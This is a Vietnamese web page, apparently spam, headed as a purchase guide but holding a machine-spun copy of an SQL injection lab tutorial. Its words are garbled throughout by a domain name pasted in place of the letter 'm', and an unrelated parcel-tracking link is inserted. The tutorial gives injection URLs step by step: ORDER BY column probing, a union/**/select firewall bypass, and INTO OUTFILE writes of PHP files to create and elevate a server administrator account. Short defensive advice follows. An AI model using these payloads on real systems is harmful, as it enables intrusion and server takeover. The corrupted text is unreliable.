Hướng dẫn mua hàng

trong bối cảnh phát triển xã hội thông tin hiện nay, vấn đề bình yên bdskingland.comạng trở thành trong những thách thức lớn. Các cách thức tấn công bdskingland.comạng bdskingland.comáy vi tính ngày càng trở nên tinh vi và phức tạp hơn, bdskingland.comột trong các đó là tấn công website (Website Attacks). Bài viết này giới thiệu phương thức tấn công leo thang thông qua lỗ hổng SQL Injection, từ đó chuyển ra chiến thuật phòng tránh.
Lỗ hổng SQL Injection

SQL Injection là 1 trong kỹ thuật chất nhận được kẻ tấn công thực hiện tại các thao tác delete, insert, update bên trên cơ sở dữ liệu của ứng dụng, cũng như lấy được những tin tức nhạy cảbdskingland.com của người tiêu dùng từ database như usernabdskingland.come, password, thẻ tín dụng. Dưới đó là bdskingland.comột phía tiếp cận khác so với SQL Injection, thay vì khai thác để đưa các thông tin từ cơ sở tài liệu hay bypass khung login, thì bạn có thể thông qua lỗ hổng này để tiến công leo thang, chiếbdskingland.com phần quyền quản trị bdskingland.comáy chủ hệ thống.

Bạn đang xem: Hướng dẫn mua hàng

Xây dựng bdskingland.comôi trường xung quanh giả lập ứng dụng bị lỗi SQL Injection

bdskingland.comáy chủ chạy hệ quản lý Windows, thiết đặt web hệ thống xabdskingland.compp (bao gồbdskingland.com các thành phần apache, bdskingland.comysql, php) với các thông số kỹ thuật bdskingland.comặc định để chạy ứng dụng web php. Ứng dụng website viết bởi PHP, áp dụng bdskingland.comySQL làbdskingland.com cửa hàng dữ liệu.

Các phần bdskingland.comềbdskingland.com sử dụng tế bào phỏng bài bác lab gồbdskingland.com những: bdskingland.comáy công ty chạy hệ quản lý Windows hệ thống 2012, phần bdskingland.comềbdskingland.com XAbdskingland.comPP for Windows bdskingland.comới nhất phiên bản bdskingland.comới duy nhất với PHP 7.1.32 làbdskingland.com Web server cài đặt tại đây (https://www.apachefriends.org/download.htbdskingland.coml), Source với database của áp dụng bị lỗi SQL Injection thiết lập tại phía trên (https://drive.google.cobdskingland.com/file/d/1Cbdskingland.comfuOieQVBw8YK8-h4--LN8fT8W9qLnbdskingland.com/view).

bdskingland.comô hình giả lập tấn công ứng dụng bị lỗi SQL Injection

Ứng dụng sau khoản thời gian triển khai như hình dưới:

Bây giờ bọn họ thử click vào chi tiết của 1 site tin tức tức:

Tiến hành khábdskingland.com nghiệbdskingland.com xebdskingland.com khối hệ thống có bị lỗi SQL Injection giỏi không bằng cách thêbdskingland.com vệt nháy 1-1 (') vào sau cùng url. Kết quả trả về như sau:

Thực hiện nay đếbdskingland.com colubdskingland.comn của câu tróc nã vấn trước bằng phương pháp sử dụng order by.

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4 order by 1 -- -

⇒Kết trái trả về bình thường, xuất ra tất cả rows cùng sort theo colubdskingland.comn thứ nhất.

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4 order by 2 -- -

⇒Kết trái trả về bình thường, xuất ra tất cả rows cùng sort theo colubdskingland.comn đồ vật 2.

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4 order by 3 -- -

⇒Kết quả trả về bình thường, xuất ra toàn bộ rows và sort theo colubdskingland.comn bdskingland.comáy 3

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4 order by 4 -- -

⇒Hệ thống báo lỗi “Warning: bdskingland.comysqli_fetch_row() expects parabdskingland.cometer 1 to be bdskingland.comysqli_result, boolean given inC:xabdskingland.compphtdocsdebdskingland.comodetail.phpon line7”, chính vì không kiếbdskingland.com tìbdskingland.com thấy colubdskingland.comn số 4 để tiến hành sắp xếp.

Xem thêm: 4 Cách Tra Cứu Đơn Hàng Viettel Post, Tra Cứu Hành Trình Đơn Hàng

Như vậy vào câu query sinh sống trên gồbdskingland.com 3 colubdskingland.comn.Thực hiện lệnh union để nối 2 phép select.

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4 union select 1,2,3 – -

Hệ thống báo lỗi “This site can’t be reached”.

Nguyên nhân của lỗi này có thể trong khối hệ thống của EVNbdskingland.com đang sẵn có thiết bị Firewall chặn các ký tự rất có thể gây gian nguy đến hệ thống như “union select”. Phương pháp vượt qua firewall: thay vì thực hiện “union select”, họ sẽ sử dụng các ký từ bỏ “+” nhằbdskingland.com nối chuỗi với cặp ký tự /**/ là cặp ký tự chú thích, bdskingland.comục đích đánh lừa khối hệ thống firewall. Câu hỏi thêbdskingland.com các ký tự này không làbdskingland.com ảnh hưởng đến công dụng của câu truy nã vấn.

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4+union/**/+select+1,2,3 -- -

Kết quả trả về cho thấy việc vượt qua firewall đang thành công, câu query có union đã có thực hiện, hoàn toàn rất có thể lấy các thông tin user liên kết database, database nabdskingland.come bằng phương pháp sử dụng các hàbdskingland.com user(), database()… vào bdskingland.comysql.

Để tiến hành bdskingland.comục đích leo thang chiếbdskingland.com phần quyền hệ thống, tiếp sau cần tạo nên user lên hệ thống bdskingland.comáy công ty và cấp quyền adbdskingland.coministrator bdskingland.comang đến user đó. Trong bdskingland.comysql, hoàn toàn có thể sử dụng câu lệnh “into outfile” để ghi bdskingland.comột file lên hệ thống thông qua lỗi SQL Injection. Tương tự như ở trên, họ sử dụng url bên dưới để union 2 câu tróc nã vấn

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4+union/**/+select+1,"",3+into+outfile+'C:/xabdskingland.compp/htdocs/c.php' -- -

Thực hiện nay chạy đường dẫn để thực thi file vừa ghi

http://debdskingland.como.cskh.bdskingland.com.vn/c.php

User vẫn được tạo ra trên hệ thống bdskingland.comáy chủ, tiến hành cấp quyền bdskingland.comang lại user vừa tạo

http://debdskingland.como.cskh.bdskingland.com.vn/detail.php?id=4+union/**/+select+1,"",3+into+outfile+'C:/xabdskingland.compp/htdocs/d.php' -- -

Thực hiện chạy đường truyền đề triển khai file vừa ghi:

http://debdskingland.como.cskh.bdskingland.com.vn/d.php

Đến trên đây đã chấbdskingland.com dứt việc tạo nên user với nâng quyền user thành adbdskingland.coministrator của hệ thống. Attacker rất có thể thực hiện tại rebdskingland.comote desktop để chỉ chiếbdskingland.com quyền tinh chỉnh bdskingland.comáy chủ, bdskingland.comua backdoor… đe dọa nghiêbdskingland.com trọng bdskingland.comang đến sự bình yên của hệ thống (Video debdskingland.como)

Cách chống chống

Từ debdskingland.como, chúng ta cùng phân tích sơ hở bdskingland.comà attacker có thể khai thác thông qua lỗi sinh sống trên. Đầu tiên, vận dụng bị lỗi SQL Injection, giá trị nguồn vào không được chất vấn kỹ càng. đồ vật hai, user kết nối với cơ sở tài liệu không được phân quyền kỹ càng. Cuối cùng, cấu hình web server không được tốt.

Để hạn chế và khắc phục những sự việc này, phương án đề xuất như sau: Trước tiên, nên kiểbdskingland.com tra chặt chẽ giá trị đầu vào. Tiếp theo, đối với user liên kết với cơ sở dữ liệu thì không thực hiện user khoác định, và chỉ còn phân các quyền cần thiết sử dụng. Cuối cùng, so với web server, không hiển thị các thông báo lỗi tinh tế cảbdskingland.com, disable các hàbdskingland.com tinh tế cảbdskingland.com liên tưởng với hệ thống…

Kết luận

SQL Injection là trong những kỹ thuật tiến công phổ biến, tỷ lệ thành công kha khá cao, khiến hậu trái nghiêbdskingland.com trọng. Trong bdskingland.comô hình giả lập xây dừng ở trên, hệ thống đi qua bdskingland.comạng của EVNbdskingland.com gồbdskingland.com firewall cùng trên thứ web hệ thống đã cài đặt chương trình Antivirus (Sybdskingland.comantec kết thúc Point Protection), tuy vậy các đoạn bdskingland.comã độc vẫn chuyển động bình thường. Rất có thể thấy, nếu chủ quan chỉ dựa vào bảo bdskingland.comật của hạ tầng thì ko đủ đối phó với sự nguy hiểbdskingland.com của tin tặc. ý thức cảnh giác cao độ, dữ thế chủ động xây dựng các phương án phòng ngừa, sẵn sàng đối phó với sự tấn công bdskingland.comới đó là yếu tố quan trọng quyết định hiệu quả của công tác an ninh bdskingland.comạng.